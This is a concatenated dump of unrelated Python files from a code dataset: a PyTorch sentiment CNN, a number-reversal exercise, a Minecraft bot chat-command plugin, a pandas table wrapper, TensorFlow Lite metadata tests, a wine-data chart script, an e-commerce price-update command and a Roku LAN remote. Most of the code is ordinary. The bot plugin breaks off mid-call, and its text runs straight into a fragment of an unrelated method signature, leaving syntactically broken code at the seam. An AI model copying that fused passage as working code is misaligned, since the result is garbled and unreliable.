self.vocab_size = vocab_size\n        self.embedding_dim = embedding_dim\n        self.class_number = class_number\n        self.filter_windows = filter_windows\n        self.in_channel = 1\n        self.out_channel = feature_maps\n        self.model = model\n\n        self.embedding = nn.Embedding(vocab_size+2, embedding_dim)\n        if model == \"static\":\n            self.embedding.weight.requires_grad = False\n        elif model == \"multichannel\":\n            self.embedding2 = nn.Embedding(vocab_size+2, embedding_dim)\n            self.embedding2.weight.requires_grad = False\n            self.in_channel = 2\n\n        self.conv = nn.ModuleList([nn.Conv2d(self.in_channel, self.out_channel, (F, embedding_dim)) for F in filter_windows])\n        self.dropout = nn.Dropout(dropout)\n        self.fc = nn.Linear(len(filter_windows) * self.out_channel, 128)\n        # self.fc1 = nn.Linear(len(filter_windows) * self.out_channel, 128) # Fully connected layer\n        # self.fc2 = nn.Linear(128, 80)\n        # self.fc3 = nn.Linear(80, class_number)\n\n    def convolution_max_pool(self, inputs, convolution, i, max_sent_len):\n        result_convolution = F.relu(convolution(inputs)).squeeze(3) # (batch_size, out_channel, max_seq_len)\n        result = F.max_pool1d(result_convolution, result_convolution.size(2)).squeeze(2) # (batch_size, out_channel)\n        return result\n\n    def forward(self, inputs):\n        # Pad inputs if less than filter window size\n        if inputs.size()[1] <= max(self.filter_windows):\n            inputs = F.pad(inputs, (1, ceil((max(self.filter_windows)-inputs.size()[1])/2))) # FINISH THIS PADDING\n        \n        max_sent_len = inputs.size(1)\n        embedding = self.embedding(inputs) # (batch_size, max_seq_len, embedding_size)\n        embedding = embedding.unsqueeze(1)\n\n        if self.model == \"multichannel\":\n            embedding2 = self.embedding2(inputs)\n            embedding2 = embedding2.unsqueeze(1)\n            embedding = torch.cat((embedding, embedding2), 1)\n        \n        result = [self.convolution_max_pool(embedding, k, i, max_sent_len) for i, k in enumerate(self.conv)]\n        result = self.fc(self.dropout(torch.cat(result, 1)))\n        # result = self.fc1(self.dropout(torch.cat(result, 1)))\n        # result = F.relu(self.fc2(result))\n        # result = F.relu(self.fc3(result))\n        return result\n\nif __name__ == '__main__':\n    # Our input $x$\n    TEXT = torchtext.data.Field()\n    # Our labels $y$\n    LABEL = torchtext.data.Field(sequential=False)\n\n    train, val, test = torchtext.datasets.SST.splits(\n        TEXT, LABEL,\n        filter_pred=lambda ex: ex.label != 'neutral')\n\n    TEXT.build_vocab(train)\n    LABEL.build_vocab(train)\n\n    train_iter, val_iter, test_iter = torchtext.data.BucketIterator.splits(\n        (train, val, test), batch_size=50, device=-1, repeat=False)\n\n    # Build the vocabulary with word embeddings\n    url = 'https://s3-us-west-1.amazonaws.com/fasttext-vectors/wiki.simple.vec'\n    TEXT.vocab.load_vectors(vectors=Vectors('wiki.simple.vec', url=url))\n\n    net = CNN(model='multichannel', vocab_size=len(TEXT.vocab), class_number=2)\n    criterion = nn.CrossEntropyLoss()\n    parameters = filter(lambda p: p.requires_grad, net.parameters())\n    optimizer = optim.Adam(parameters, lr=0.00025)\n\n    for epoch in range(50):\n        total_loss = 0\n        for batch in train_iter:\n            text, label = batch.text.t_(), batch.label\n            label = label - 1\n            net.zero_grad()\n\n            logit = net(text)\n            loss = criterion(logit, label)\n            loss.backward()\n            nn.utils.clip_grad_norm(parameters, max_norm=3)\n            optimizer.step()\n\n            total_loss += loss.data\n        print(str(epoch) + \" loss = \" + str(total_loss))\n\n        print(\"VAL SET\", validate(net, val_iter))\n\n# TESTING\n\"All models should be able to be run with following command.\"\nupload = []\n# Update: for kaggle the bucket iterator needs to have 
batch_size 10\n# test_iter = torchtext.data.BucketIterator(test, train=False, batch_size=10, repeat=False)\ncorrect, total = 0.0, 0.0\nfor batch in test_iter:\n # Your prediction data here (don't cheat!)\n probs = net(batch.text.t_())\n _, argmax = probs.max(1)\n for i, predicted in enumerate(list(argmax.data)):\n if predicted+1 == batch.label[i].data[0]:\n correct += 1\n total += 1\n\n upload += list(argmax.data)\nprint(\"TEST SET:\", correct / total)\n# print(\"Upload: \", upload)\n\nwith open(\"predictions.txt\", \"w\") as f:\n for u in upload:\n f.write(str(u) + \"\\n\")\n","sub_path":"HW1/5_Extension.py","file_name":"5_Extension.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"2542671","text":"from random import randint\nfrom random import seed\nimport numpy as np\nseed(135)\n\nclass Reverser:\n\n def reverse(self, num):\n num_check = num if not isinstance(num, str) else bin_to_dec(num)\n if num_check < - 2**31 or num_check >= 2**31:\n return 0\n else:\n if(isinstance(num, str)):\n num_str = str(num)\n mult = ''\n if num_str[0] == '-':\n num_str = num_str[1:]\n mult = '-'\n return mult + (num_str[::-1])\n if(not isinstance(num, str)):\n num_str = str(num)\n mult = 1\n if num_str[0] == '-':\n num_str = num_str[1:]\n mult = -1\n return int(num_str[::-1]) * mult\n\n\ndef to_bits(num):\n return '{0:01b}'.format(num)\n\n\ndef bin_to_dec(num):\n if(not isinstance(num, str)): num = str(num)\n mult = 1\n if num[0] == '-':\n num = num[1:]\n mult = -1\n r_num = num[::-1]\n idxs = []\n for i in range(len(r_num)):\n if r_num[i] == '1':\n idxs.append(i)\n result = 0\n for i in idxs:\n result += 2**i\n return result * mult\n\n\ndef binary_sum(num1, num2):\n d_num1 = bin_to_dec(num1)\n d_num2 = bin_to_dec(num2)\n result = d_num1 + d_num2\n return to_bits(result)\n \na = []\nb = []\nc = []\n\ndim = 13\nfor i in range(dim):\n a.append(randint(-2**31, 2**31))\n\nr = Reverser()\nfor i in range(dim):\n b.append(r.reverse(a[i]))\n\nfor i in range(dim):\n c.append(r.reverse(b[i]))\nanswer_1_true = a[1]\nanswer_2_true = b[2]\nanswer_3_true = sum(np.array(a) != np.array(c) * 1.0)\nanswer_4_true = sum(np.array(c) == 0 * 1.0)\nanswer_5_true = r.reverse(binary_sum(to_bits(a[0]),to_bits(b[0])))\n\n\nprint(answer_1_true)\nprint(answer_2_true)\nprint(answer_3_true)\nprint(answer_4_true)\nprint(answer_5_true)\n","sub_path":"03_Implementacao/DataBase/true_or_false_question_32_bit_nums/full_program.py","file_name":"full_program.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"403770972","text":"\"\"\"\nCommands can be sent to spock in the format !command args from ingame chat\n\"\"\"\n__author__ = \"Morgan Creekmore\"\n__copyright__ = \"Copyright 2015, The SpockBot Project\"\n__license__ = \"MIT\"\n\nfrom spock.utils import string_types\n\nimport logging\nlogger = logging.getLogger('spock')\n\nclass ChatCommandPlugin:\n\tdef __init__(self, ploader, settings):\n\t\tself.event = ploader.requires('Event')\n\t\tploader.reg_event_handler(\n\t\t\t'PLAY List[str]:\n if ignored_attributes is None:\n ignored_attributes = {}\n return Stream(self.keys).filter(lambda attribute: attribute not in ignored_attributes).toList()\n\n def rows(self, *, ignored_attributes=None) -> np.array:\n columns = Stream(self.attributes(ignored_attributes=ignored_attributes)).map(\n lambda attribute: self.dataframe[attribute]).toList()\n matrix = 
np.array(columns).transpose()\n if self.row_limit > 0:\n return matrix[:self.row_limit]\n return matrix\n\n def column(self, attribute_name: str) -> np.array:\n if self.row_limit > 0:\n return np.array(self.dataframe[attribute_name][:self.row_limit])\n return np.array(self.dataframe[attribute_name])\n\n def column_transform(self, column_name: str, transformation: Callable) -> None:\n for i, element in enumerate(self.dataframe[column_name]):\n self.dataframe[column_name][i] = transformation(element)\n\n if i == self.row_limit:\n print(\"Reached row limit.\")\n break\n\n def add_column(self, column_name: str, row_creation_function: Callable) -> None:\n new_column = np.zeros(len(self.dataframe['Duration']))\n new_column += [row_creation_function(x) for x in self.rows()] + [x for x in range(self.row_limit, len(\n self.dataframe['Duration']))]\n self.dataframe = self.dataframe.assign(**{column_name: pd.Series(np.array(new_column)).values})\n self.keys.append(column_name)\n\n def filter_rows(self, query: str) -> \"DataframeTable\":\n \"\"\"Returns a new table containing only the matching rows.\"\"\"\n return DataframeTable(self.dataframe.query(query), row_limit=self.row_limit)\n\n","sub_path":"experiment_framework/infrastructure/data/dataframe_table.py","file_name":"dataframe_table.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"555235135","text":"# Copyright 2020 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for metadata info classes.\"\"\"\n\nfrom absl.testing import parameterized\n\nimport tensorflow as tf\n\nimport flatbuffers\nfrom tensorflow_lite_support.metadata import metadata_schema_py_generated as _metadata_fb\nfrom tensorflow_lite_support.metadata import schema_py_generated as _schema_fb\nfrom tensorflow_lite_support.metadata.python import metadata as _metadata\nfrom tensorflow_lite_support.metadata.python.metadata_writers import metadata_info\nfrom tensorflow_lite_support.metadata.python.tests.metadata_writers import test_utils\n\n\nclass GeneralMdTest(tf.test.TestCase):\n\n _EXPECTED_GENERAL_META_JSON = \"../testdata/general_meta.json\"\n\n def test_create_metadata_should_succeed(self):\n general_md = metadata_info.GeneralMd(\n name=\"model\",\n version=\"v1\",\n description=\"A ML model.\",\n author=\"TensorFlow\",\n licenses=\"Apache\")\n general_metadata = general_md.create_metadata()\n\n # Create the Flatbuffers object and convert it to the json format.\n builder = flatbuffers.Builder(0)\n builder.Finish(\n general_metadata.Pack(builder),\n _metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)\n metadata_json = _metadata.convert_to_json(bytes(builder.Output()))\n\n expected_json = test_utils.load_file(self._EXPECTED_GENERAL_META_JSON, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass 
AssociatedFileMdTest(tf.test.TestCase):\n\n _EXPECTED_META_JSON = \"../testdata/associated_file_meta.json\"\n\n def test_create_metadata_should_succeed(self):\n file_md = metadata_info.AssociatedFileMd(\n file_path=\"label.txt\",\n description=\"The label file.\",\n file_type=_metadata_fb.AssociatedFileType.TENSOR_AXIS_LABELS,\n locale=\"en\")\n file_metadata = file_md.create_metadata()\n\n # Create the Flatbuffers object and convert it to the json format.\n model_metadata = _metadata_fb.ModelMetadataT()\n model_metadata.associatedFiles = [file_metadata]\n builder = flatbuffers.Builder(0)\n builder.Finish(\n model_metadata.Pack(builder),\n _metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)\n metadata_json = _metadata.convert_to_json(bytes(builder.Output()))\n\n expected_json = test_utils.load_file(self._EXPECTED_META_JSON, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass TensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n _TENSOR_NAME = \"input\"\n _TENSOR_DESCRIPTION = \"The input tensor.\"\n _TENSOR_MIN = 0\n _TENSOR_MAX = 1\n _LABEL_FILE_EN = \"labels.txt\"\n _LABEL_FILE_CN = \"labels_cn.txt\" # Locale label file in Chinese.\n _EXPECTED_FEATURE_TENSOR_JSON = \"../testdata/feature_tensor_meta.json\"\n _EXPECTED_IMAGE_TENSOR_JSON = \"../testdata/image_tensor_meta.json\"\n _EXPECTED_BOUNDING_BOX_TENSOR_JSON = \"../testdata/bounding_box_tensor_meta.json\"\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"feature_tensor\",\n \"content_type\": _metadata_fb.ContentProperties.FeatureProperties,\n \"golden_json\": _EXPECTED_FEATURE_TENSOR_JSON\n }, {\n \"testcase_name\": \"image_tensor\",\n \"content_type\": _metadata_fb.ContentProperties.ImageProperties,\n \"golden_json\": _EXPECTED_IMAGE_TENSOR_JSON\n }, {\n \"testcase_name\": \"bounding_box_tensor\",\n \"content_type\": _metadata_fb.ContentProperties.BoundingBoxProperties,\n \"golden_json\": _EXPECTED_BOUNDING_BOX_TENSOR_JSON\n })\n def test_create_metadata_should_succeed(self, content_type, golden_json):\n associated_file1 = metadata_info.AssociatedFileMd(\n file_path=self._LABEL_FILE_EN, locale=\"en\")\n associated_file2 = metadata_info.AssociatedFileMd(\n file_path=self._LABEL_FILE_CN, locale=\"cn\")\n\n tensor_md = metadata_info.TensorMd(\n name=self._TENSOR_NAME,\n description=self._TENSOR_DESCRIPTION,\n min_values=[self._TENSOR_MIN],\n max_values=[self._TENSOR_MAX],\n content_type=content_type,\n associated_files=[associated_file1, associated_file2])\n tensor_metadata = tensor_md.create_metadata()\n\n metadata_json = _metadata.convert_to_json(\n _create_dummy_model_metadata(tensor_metadata))\n expected_json = test_utils.load_file(golden_json, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass InputImageTensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n _NAME = \"image\"\n _DESCRIPTION = \"The input image.\"\n _NORM_MEAN = (0, 127.5, 255)\n _NORM_STD = (127.5, 127.5, 127.5)\n _COLOR_SPACE_TYPE = _metadata_fb.ColorSpaceType.RGB\n _EXPECTED_FLOAT_TENSOR_JSON = \"../testdata/input_image_tensor_float_meta.json\"\n _EXPECTED_UINT8_TENSOR_JSON = \"../testdata/input_image_tensor_uint8_meta.json\"\n _EXPECTED_UNSUPPORTED_TENSOR_JSON = \"../testdata/input_image_tensor_unsupported_meta.json\"\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"float\",\n \"tensor_type\": _schema_fb.TensorType.FLOAT32,\n \"golden_json\": _EXPECTED_FLOAT_TENSOR_JSON\n }, {\n \"testcase_name\": \"uint8\",\n \"tensor_type\": _schema_fb.TensorType.UINT8,\n \"golden_json\": 
_EXPECTED_UINT8_TENSOR_JSON\n      }, {\n          \"testcase_name\": \"unsupported_tensor_type\",\n          \"tensor_type\": _schema_fb.TensorType.INT16,\n          \"golden_json\": _EXPECTED_UNSUPPORTED_TENSOR_JSON\n      })\n  def test_create_metadata_should_succeed(self, tensor_type, golden_json):\n    tensor_md = metadata_info.InputImageTensorMd(\n        name=self._NAME,\n        description=self._DESCRIPTION,\n        norm_mean=list(self._NORM_MEAN),\n        norm_std=list(self._NORM_STD),\n        color_space_type=self._COLOR_SPACE_TYPE,\n        tensor_type=tensor_type)\n    tensor_metadata = tensor_md.create_metadata()\n\n    metadata_json = _metadata.convert_to_json(\n        _create_dummy_model_metadata(tensor_metadata))\n    expected_json = test_utils.load_file(golden_json, \"r\")\n    self.assertEqual(metadata_json, expected_json)\n\n  def test_init_should_throw_exception_with_incompatible_mean_and_std(self):\n    norm_mean = [0]\n    norm_std = [1, 2]\n    with self.assertRaises(ValueError) as error:\n      metadata_info.InputImageTensorMd(norm_mean=norm_mean, norm_std=norm_std)\n    # TODO(b/175843689): Python version cannot be specified in Kokoro bazel test\n    self.assertEqual(\n        \"norm_mean and norm_std are expected to be the same dim. But got \" +\n        \"{} and {}\".format(len(norm_mean), len(norm_std)), str(error.exception))\n\n\nclass ClassificationTensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n  _NAME = \"probability\"\n  _DESCRIPTION = \"The classification result tensor.\"\n  _LABEL_FILE_EN = \"labels.txt\"\n  _LABEL_FILE_CN = \"labels_cn.txt\"  # Locale label file in Chinese.\n  _EXPECTED_FLOAT_TENSOR_JSON = \"../testdata/classification_tensor_float_meta.json\"\n  _EXPECTED_UINT8_TENSOR_JSON = \"../testdata/classification_tensor_uint8_meta.json\"\n  _EXPECTED_UNSUPPORTED_TENSOR_JSON = \"../testdata/classification_tensor_unsupported_meta.json\"\n\n  @parameterized.named_parameters(\n      {\n          \"testcase_name\": \"float\",\n          \"tensor_type\": _schema_fb.TensorType.FLOAT32,\n          \"golden_json\": _EXPECTED_FLOAT_TENSOR_JSON\n      }, {\n          \"testcase_name\": \"uint8\",\n          \"tensor_type\": _schema_fb.TensorType.UINT8,\n          \"golden_json\": _EXPECTED_UINT8_TENSOR_JSON\n      }, {\n          \"testcase_name\": \"unsupported_tensor_type\",\n          \"tensor_type\": _schema_fb.TensorType.INT16,\n          \"golden_json\": _EXPECTED_UNSUPPORTED_TENSOR_JSON\n      })\n  def test_create_metadata_should_succeed(self, tensor_type, golden_json):\n    label_file_en = metadata_info.LabelFileMd(\n        file_path=self._LABEL_FILE_EN, locale=\"en\")\n    label_file_cn = metadata_info.LabelFileMd(\n        file_path=self._LABEL_FILE_CN, locale=\"cn\")\n    tensor_md = metadata_info.ClassificationTensorMd(\n        name=self._NAME,\n        description=self._DESCRIPTION,\n        label_files=[label_file_en, label_file_cn],\n        tensor_type=tensor_type)\n    tensor_metadata = tensor_md.create_metadata()\n\n    metadata_json = _metadata.convert_to_json(\n        _create_dummy_model_metadata(tensor_metadata))\n    expected_json = test_utils.load_file(golden_json, \"r\")\n    self.assertEqual(metadata_json, expected_json)\n\n\nclass CategoryTensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n  _NAME = \"category\"\n  _DESCRIPTION = \"The category tensor.\"\n  _LABEL_FILE_EN = \"labels.txt\"\n  _LABEL_FILE_CN = \"labels_cn.txt\"  # Locale label file in Chinese.\n  _EXPECTED_TENSOR_JSON = \"../testdata/category_tensor_float_meta.json\"\n\n  def test_create_metadata_should_succeed(self):\n    label_file_en = metadata_info.LabelFileMd(\n        file_path=self._LABEL_FILE_EN, locale=\"en\")\n    label_file_cn = metadata_info.LabelFileMd(\n        file_path=self._LABEL_FILE_CN, locale=\"cn\")\n    tensor_md = metadata_info.CategoryTensorMd(\n        name=self._NAME,\n        description=self._DESCRIPTION,\n        label_files=[label_file_en, label_file_cn])\n    tensor_metadata = tensor_md.create_metadata()\n\n    metadata_json = _metadata.convert_to_json(\n        _create_dummy_model_metadata(tensor_metadata))\n    expected_json = test_utils.load_file(self._EXPECTED_TENSOR_JSON, \"r\")\n    self.assertEqual(metadata_json, expected_json)\n\n\ndef _create_dummy_model_metadata(\n    tensor_metadata: _metadata_fb.TensorMetadataT) -> bytes:\n  # Create a dummy model using the tensor metadata.\n  subgraph_metadata = _metadata_fb.SubGraphMetadataT()\n  subgraph_metadata.inputTensorMetadata = [tensor_metadata]\n  model_metadata = _metadata_fb.ModelMetadataT()\n  model_metadata.subgraphMetadata = [subgraph_metadata]\n\n  # Create the Flatbuffers object and convert it to the json format.\n  builder = flatbuffers.Builder(0)\n  builder.Finish(\n      model_metadata.Pack(builder),\n      _metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)\n  return bytes(builder.Output())\n\n\nif __name__ == \"__main__\":\n  tf.test.main()\n","sub_path":"tensorflow_lite_support/metadata/python/tests/metadata_writers/metadata_info_test.py","file_name":"metadata_info_test.py","file_ext":"py","file_size_in_byte":10552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"96331801","text":"# program name: an1_health.py\n\n# no optional arguments: Uses Wine data to display information about whether certain \n# classes are higher in healthy attributes\n# \n# output: side-by-side bar charts\n\nprint('========================================================================================')\nprint('========================================================================================')\n\nprint('> start of program an1_health.py')\nprint('> import libraries')\n\nimport argparse\nimport os.path as op\nimport csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom numpy.polynomial.polynomial import polyfit\n\nprint('> define convert_type function')\ndef convert_type(data_value):\n    try:\n        return int(data_value)\n    except ValueError:\n        try:\n            return float(data_value)\n        except ValueError:\n            return data_value\n\nprint(\"> define get_delim function\")\ndef get_delim(sourcefile1):\n    print('> executing get_delim function')\n    data = open(sourcefile1, 'r') \n    my_read_data = data.read()\n    if my_read_data.find(',') > 0:\n        print('  delimiter: comma')\n        return ','\n    else:\n        print('  delimiter: space')\n        return ' ' \n    print(' ')\n\ndef lines_to_dict(lines, header=False):\n    print('> executing lines_to_dict')\n    # column_titles = ['Class','Alcohol','Malic acid','Ash','Alcalinity of ash','Magnesium','Total phenols','Flavanoids','Nonflavanoid phenols','Proanthocyanins','Color intensity','Hue',\n    #                  'OD280/OD315 of diluted wines','Proline']\n    column_titles = ['class','alc','ma','ash','alkash','mg','tphen','flav','nfphen','pac','ci','hue',\n                     'od','proline']\n    \n    data_dict = {}\n    for idx, column in enumerate(column_titles):\n        data_dict[column] = []\n        for row in lines:\n            data_dict[column] += [row[idx]]\n    return data_dict\n\ndef parse_file(data_file, dlm, debug=False):  # delimiter is passed in as dlm\n    print('> executing parse_file')\n    # Verify the file exists\n    assert(op.isfile(data_file))\n\n    # open it as a csv \n    with open(data_file, 'r') as fhandle:\n        csv_reader = csv.reader(fhandle, delimiter=dlm)\n        # Add each line in the file to a list\n        lines = []\n        if debug:\n            count = 0\n        for line in csv_reader:\n            if debug:\n                if count > 2:\n                    break\n                count += 1\n            newline = []\n            for value in 
line:\n                newline += [convert_type(value)]\n            if len(newline) > 0:\n                lines += [newline]\n\n    print('> view a few lines')\n    print(' ')\n    for line in lines[0:2]:\n        print(line)\n    print(' ')\n    # Return all the contents of our file\n    return lines\n\n\n# class','alc','ma','ash','alkash','mg','tphen','flav','nfphen','pac','ci','hue',\n#   'od','proline\n# attributes with health benefits: ma mg tphen proline\n\ndef plot_means(dd):\n    df = pd.DataFrame(dd, columns = ['class','ma', 'mg', 'tphen', 'proline']) \n    #print(df)\n    c1 = df.loc[(df['class'] == 1) ] \n    c2 = df.loc[(df['class'] == 2) ]\n    c3 = df.loc[(df['class'] == 3) ] \n    # get means of each health attribute by class\n    mean_dict = {'class':[1,2,3],\n        'ma': [c1['ma'].mean(), c2['ma'].mean(), c3['ma'].mean()],\n        'mg': [c1['mg'].mean(), c2['mg'].mean(), c3['mg'].mean()],\n        'tphen': [c1['tphen'].mean(), c2['tphen'].mean(), c3['tphen'].mean()],\n        'proline': [c1['proline'].mean(), c2['proline'].mean(), c3['proline'].mean()] } \n    # print(mean_dict)\n    mean_df = pd.DataFrame(mean_dict)\n    print(mean_df)\n\n    labels = ['Class 1', 'Class 2', 'Class 3']\n    x = np.arange(len(labels))  # the label locations\n    width = 0.2  # the width of the bars\n    fig, ax = plt.subplots()\n\n    rects1 = ax.bar(x - 0.3, mean_df['ma'], width, label='Malic Acid', color='firebrick')\n    rects2 = ax.bar(x - 0.1, mean_df['mg']/100, width, label='Magnesium/100', color='rebeccapurple')\n    rects3 = ax.bar(x + 0.1, mean_df['tphen'], width, label='Total Phenols', color='olivedrab')\n    rects4 = ax.bar(x + 0.3, mean_df['proline']/1000, width, label='Proline/1000', color='saddlebrown')\n\n    ax.set_ylabel('Mean Values of Attributes')\n    ax.set_title('Mean Values of Beneficial Attributes for Each Class')\n    ax.set_xticks(x)\n    ax.set_xticklabels(labels)\n    ax.legend()\n\n    plt.savefig(\"an1_health.png\")\n    plt.show()\n\ndef main():\n\n    data_file = \"wine.data\"\n    dlm = get_delim(data_file) \n    my_data = parse_file(data_file, dlm)\n    data_dictionary = lines_to_dict(my_data)\n    #print(data_dictionary)\n\n    plot_means(data_dictionary)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"evp001/an1_health.py","file_name":"an1_health.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"91417903","text":"from django.core.management.base import BaseCommand, CommandError\nfrom apps.catalogue.models import Product, AttributeOption, AttributeOptionGroup\nfrom oscar.apps.partner.models import StockRecord\nfrom lxml import etree\nfrom zapas.settings import PRODUCT_XML\n\n\nclass Command(BaseCommand):\n    help = 'get price and color name from the product XML file and save them to the db'\n\n    def handle(self, *args, **options):\n        try:\n            attrgroup = AttributeOptionGroup.objects.get(name=u'Цвет')\n        except AttributeOptionGroup.DoesNotExist:\n            attrgroup = AttributeOptionGroup.objects.create(name=u'Цвет')\n            attrgroup.save()\n        for i in AttributeOption.objects.filter(group=attrgroup):\n            i.delete()\n        xml = etree.parse(PRODUCT_XML).getroot()\n        all_prods = Product.objects.filter(structure='parent')\n        for product in all_prods:\n            try:\n                xml_product = xml.xpath('*//product[@id=\"%s\"]'%product.upc)[0]\n            except IndexError:\n                self.stdout.write('product %s not found in the XML, skipping' % product.upc)\n                continue\n            color = xml_product.find('product_color').text\n            price = xml_product.find('product_prices/price_uah').text\n            childs = Product.objects.filter(parent=product)\n            for child in childs:\n                stock = StockRecord.objects.get(product=child)\n                stock.price_excl_tax = price\n                stock.save()\n\n            try:\n                attrcolorname = 
AttributeOption.objects.get(group=attrgroup, option=color)\n            except AttributeOption.DoesNotExist:\n                try:\n                    attrcolorname = AttributeOption.objects.create(group=attrgroup, option=color)\n                    attrcolorname.save()\n                except Exception:\n                    continue\n\n            # Assign the AttributeOption once; a second plain-string assignment\n            # here used to overwrite it immediately.\n            product.attr.color = attrcolorname\n\n            product.save()\n            self.stdout.write('product %s changed!!!' % product.upc)
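\n\n# A more idiomatic alternative (sketch only, not wired in above): Django's\n# built-in get_or_create collapses the try/get/except/create pattern into a\n# single call that returns the option and a created flag:\n#\n#     attrcolorname, created = AttributeOption.objects.get_or_create(\n#         group=attrgroup, option=color)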
","sub_path":"main/management/commands/colorprice.py","file_name":"colorprice.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"236485632","text":"import sys; import socket; import time; import re; import xml.etree.ElementTree; import urllib;\nif sys.version_info[0]>2:raw_input=input\nhelpMessage=\"\"\"Commands:\nhome; 'Home' key\ntext:args; Sends text to roku\nleft; 'left' key\nright; 'right' key\nup; 'up' key\ndown; 'down' key\nselect; 'OK' key\nok; 'OK' key\nrw; 'rewind (<<)' key\nrewind; 'rewind (<<)' key\nffw; 'Fast Forward (>>)' key\nfastforward; 'Fast Forward (>>)' key\nback; 'Back' key\nplay; 'Play/Pause' key\npause; 'Play/Pause' key\nbackspace; 'backspace' key\nbksp; 'backspace' key\nclear; Backspace 150 times\n\"\"\"\nssdpMessage=\"\"\"M-SEARCH * HTTP/1.1\nHost: 239.255.255.250:1900\nMan: \"ssdp:discover\"\nST: roku:ecp\n\n\"\"\"\ndef urlencode(x):\n\tif sys.version_info[0] < 3:return urllib.quote_plus(x)\n\telse:return urllib.parse.quote_plus(x)\n#Gets device version\ndef getRokuType(rokuIP):\n\ttry:\n\t\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((rokuIP, 8060));\n\t\ts.send(\"GET /query/device-info HTTP/1.1\\r\\n\\r\\n\".encode())\n\t\tcontentLength=int(re.findall(r'\\r\\nContent-Length: (\\d+)\\r\\n', str(s.recv(1024)))[0])\n\t\trokuData=xml.etree.ElementTree.fromstring(str(s.recv(contentLength)))\n\t\treturn rokuData.find(\"model-name\").text\n\texcept Exception:return getRokuType(rokuIP) #retry until the device answers\n#Sends commands to rokus\ndef sendCommand(rokuIP, command):\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((rokuIP, 8060));\n\ts.send((\"POST /\"+command+\" HTTP/1.1\\r\\n\\r\\n\").encode());\ndef sendText(rokuIP, text):\n\tfor char in text:\n\t\tsendCommand(rokuIP, \"keypress/lit_\"+urlencode(char))\n\t\ttime.sleep(0.1)\n#Discovers rokus\ndef discoverRokus():\n\ts=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.sendto(ssdpMessage.encode(), (\"239.255.255.250\", 1900));\n\ts.settimeout(1)\n\ttry: return re.findall(r'LOCATION: http://(.*):8060', str(s.recvfrom(1024)))[0]\n\texcept socket.timeout: return None\n#Repeatedly scans for x seconds\ndef scanRokus(seconds):\n\tstartTime=time.time()\n\tallRokus=[]\n\twhile(time.time()<startTime+seconds):\n\t\tfound=discoverRokus()\n\t\tif found!=None and found not in allRokus:allRokus.append(found)\n\treturn allRokus\n#Parse command line arguments\nselectedRokuIP=None\nif \"--scan\" in sys.argv:\n\tif len(sys.argv)>=(sys.argv.index(\"--scan\")+2):\n\t\ttry: eval(sys.argv[sys.argv.index(\"--scan\")+1])\n\t\texcept Exception: print(\"Invalid expression or number\"); sys.exit()\n\t\tfor foundIP in scanRokus(eval(sys.argv[sys.argv.index(\"--scan\")+1])): #Optionally change eval() to int()\n\t\t\tprint(foundIP)\n\telse: print(\"Seconds for scan required (example: 'RokuRemote --scan 1.5')\")\n\tsys.exit()\nif \"--ip\" in sys.argv:\n\tif len(sys.argv)>=(sys.argv.index(\"--ip\")+2):\n\t\tselectedRokuIP=sys.argv[sys.argv.index(\"--ip\")+1]\n\telse:print(\"No ip given after --ip\"); sys.exit()\n#User selects roku here\nif selectedRokuIP==None:\n\tprint(\"Scanning... (10 Seconds)\\n\")\n\tallRokus=scanRokus(10)\n\tfor index, rokuIP in enumerate(allRokus):\n\t\tprint(str(index)+\":\\nIP: '\"+rokuIP+\"'\\nType: '\"+getRokuType(rokuIP)+\"'\\n\")\n\tsys.stdout.write(\"Enter Selected Roku Number: \")\n\twhile 1:\n\t\ttry:selectedRokuIP=allRokus[int(raw_input())]; break\n\t\texcept Exception: print(\"\\nInvalid number\"); sys.stdout.write(\"Enter Selected Roku Number: \")\n\tprint(\"Using Roku IP: '\"+selectedRokuIP+\"'\")\nelse:print(\"Using Pre-Set IP: '\"+selectedRokuIP+\"'\")\nprint(\"Type q/quit to quit, or h/help for more commands\")\n#Main Loop Here\nwhile 1:\n\tcommand=raw_input()\n\tif command==\"q\" or command==\"quit\": sys.exit()\n\telif command==\"h\" or command==\"help\": print(helpMessage)\n\telif command==\"up\": sendCommand(selectedRokuIP, \"keypress/Up\")\n\telif command==\"down\": sendCommand(selectedRokuIP, \"keypress/Down\")\n\telif command==\"left\": sendCommand(selectedRokuIP, \"keypress/Left\")\n\telif command==\"right\": 